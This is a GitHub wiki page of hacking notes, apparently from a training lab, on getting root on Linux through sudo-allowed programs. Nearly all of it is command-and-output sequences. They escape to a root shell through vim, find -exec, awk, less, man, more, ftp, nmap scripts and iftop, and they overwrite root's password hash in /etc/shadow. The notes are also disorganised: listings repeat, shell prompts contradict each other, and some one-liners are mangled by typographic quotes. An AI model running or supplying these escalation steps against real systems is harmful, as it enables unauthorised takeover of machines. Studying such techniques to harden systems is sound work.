info ‐ sudo privesc linux - taylorjohn/hacking GitHub Wiki
linux privesc methods
root@attack_ip:$ ssh [email protected]
root@attack_ip: password:$ password321
user@debian:$ whoami
user
user@debian:$ id
user@debian:~$ sudo -l
(root) NOPASSWD: / usr/sbin/iftop
(root) NOPASSWD: / usr/bin/find
(root) NOPASSWD: / usr/bin/nano
(root) NOPASSWD: / usr/bin/vim
(root) NOPASSWD: / usr/bin/man
(root) NOPASSWD: / usr/bin/awk
(root) NOPASSWD: / usr/bin/less
(root) NOPASSWD: / usr/bin/ftp
(root) NOPASSWD: / usr/bin/nmap
(root) NOPASSWD: / usr/bin/apache2
(root) NOPASSWD: /bin/more
/usr/bin/vim and /usr/bin/nano
Both vim and nano can be used to execute commands or edit privileged files.
(root) NOPASSWD: / usr/bin/vim
user@debian:~$user@debian:~$
user@debian:~$ sudo vim -c ':!/bin/sh'
Nano: Nano can be used to edit any file due to its root privileges. You could modify /etc/passwd or /etc/sudoers to grant more explicit access:
(root) NOPASSWD: / usr/bin/nano
sudo nano /etc/sudoers
/usr/bin/find The find command can execute commands with the -exec option.
bash
user@debian:~$ sudo -l
(root) NOPASSWD: / usr/sbin/iftop
(root) NOPASSWD: / usr/bin/find
(root) NOPASSWD: / usr/bin/nano
(root) NOPASSWD: / usr/bin/vim
(root) NOPASSWD: / usr/bin/man
(root) NOPASSWD: / usr/bin/awk
(root) NOPASSWD: / usr/bin/less
(root) NOPASSWD: / usr/bin/ftp
(root) NOPASSWD: / usr/bin/nmap
(root) NOPASSWD: / usr/bin/apache2
(root) NOPASSWD: /bin/more
user@debian:~$ sudo find / -exec /bin/sh \; -quit
sh-4.1# whoami
root
This executes a shell with root privileges.
/usr/bin/awk Awk can execute system commands, making it possible to spawn a shell.
bash
root@attack_ip:$ sudo awk 'BEGIN {system("/bin/sh")}'
sh-4.1# whoami
root
/usr/bin/less, /usr/bin/man, /bin/more These pager utilities can often be exploited to spawn a shell.
bash
root@attack_ip:$ sudo less /etc/passwd
Then, typing !sh inside less/man/more will drop you into a shell.
root@attack_ip:$ !sh
sh-4.1# whoami
root
/usr/bin/ftp FTP can be used to download and execute scripts, or in some versions, to spawn a TTY shell directly.
bash
root@attack_ip:$ echo '!/bin/sh' | sudo ftp
/usr/bin/nmap Nmap contains an interactive mode that allows Lua scripting, which can be exploited to gain a shell.
(root) NOPASSWD: / usr/bin/nmap
If the version of Nmap is < 7.70, you can use it to spawn a shell.
bash
root@attack_ip:$ echo 'os.execute("/bin/sh")' > shell.nse
root@attack_ip:$ sudo nmap --script=shell.nse
Starting Nmap 5.00 ( http://nmap.org ) at 2024-03-22 14:27 EDT
sh-4.1# whoami
root
root@attack_ip: password:$ password321
user@debian:~$ whoami
- Apache2
/usr/bin/apache2 Although not commonly used for direct privilege escalation, if you have the ability to configure Apache or manipulate its configuration files, you could potentially serve malicious content or leverage Apache modules to execute commands.
- Iftop
/usr/sbin/iftop Iftop doesn't have a direct known method for spawning a shell or executing commands, but always check for updated exploits or creative uses.
-
Readable /etc/shadow
-
Writable /etc/shadow
ls -l /etc/shadow
sudo cat /etc/shadow
mark:$6$.n.:17736:0:99999:7::: [--] [----] [---] - [---] ---- | | | | | |||+-----------> 9. Unused | | | | | ||+------------> 8. Expiration date | | | | | |+-------------> 7. Inactivity period | | | | | +--------------> 6. Warning period | | | | +------------------> 5. Maximum password age | | | +----------------------> 4. Minimum password age | | +--------------------------> 3. Last password change | +---------------------------------> 2. Encrypted Password +----------------------------------------> 1. Username
linuxize:$6$zHvrJMa5Y690smbQ$z5zdL...:18009:0:120:7:14::
- The password is encrypted with SHA-512 (the password is truncated for better readability).
- The password was last changed on April 23, 2019 - 18009.
- There is no minimum password age.
- The password must be changed at least every 120 days.
- The user will receive a warning message seven days before the password expiration date.
- If the user doesn’t attempt to login to the system 14 days after the password is expired, the account will be disabled.
- There is no account expiration date.
Generate a new password hash with a password of your choice:
mkpasswd -m sha-512 newpasswordhere
Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.
mkpasswd -m sha-512 newpassword
7dd29a9c9643fd524e1b4360964b89ce59914e68d1fd1ab04dd61fbaaabc58e579dcffb5b7454ab01e586c8ae98e538b5d6e0ff3ae7dd442de7333486dc9df1a
Switch to the root user, using the new password:
su root
sudo -l
sudo iftop ====> then ====> !/bin/bash
user@debian:~$ sudo -l
(root) NOPASSWD: / usr/sbin/iftop
(root) NOPASSWD: / usr/bin/find
(root) NOPASSWD: / usr/bin/nano
(root) NOPASSWD: / usr/bin/vim
(root) NOPASSWD: / usr/bin/man
(root) NOPASSWD: / usr/bin/awk
(root) NOPASSWD: / usr/bin/less
(root) NOPASSWD: / usr/bin/ftp
(root) NOPASSWD: / usr/bin/nmap
(root) NOPASSWD: / usr/bin/apache2
(root) NOPASSWD: /bin/more
user@debian:~$ sudo iftop
onpens iftop
!/bin/bash
root@debian: /home/usr~$# whoami
root
root@debian: /home/usr~$#
user@debian:~$ sudo -l
(root) NOPASSWD: / usr/sbin/iftop
(root) NOPASSWD: / usr/bin/find
(root) NOPASSWD: / usr/bin/nano
(root) NOPASSWD: / usr/bin/vim
(root) NOPASSWD: / usr/bin/man
(root) NOPASSWD: / usr/bin/awk
(root) NOPASSWD: / usr/bin/less
(root) NOPASSWD: / usr/bin/ftp
(root) NOPASSWD: / usr/bin/nmap
(root) NOPASSWD: / usr/bin/apache2
(root) NOPASSWD: /bin/more
user@debian:~$ sudo find /home -exec /bin/bash \;
root@debian:~$ /home/usr/# whoami
root
sudo man man ====> then ====> !/bin/bash
user@debian:~$ sudo man man
!/bin/bash
root@debian:~$ /usr/share/man#
root@debian:~$ whoami
root
sudo nano ====> then ====> ^R^X ====> reset; sh 1>&0 2>&0 sudo vim -c ‘!sh’
sudo awk ‘BEGIN {system(“/bin/sh”)}’ sudo less /etc/hosts ====> then ====> !/bin/bash sudo ftp ====> then ====> !/bin/bash echo “os.execute(‘/bin/sh’)” > shell.nse && sudo nmap — script=shell.nse TERM= sudo more /etc/profile ====> the ====> !/bin/sh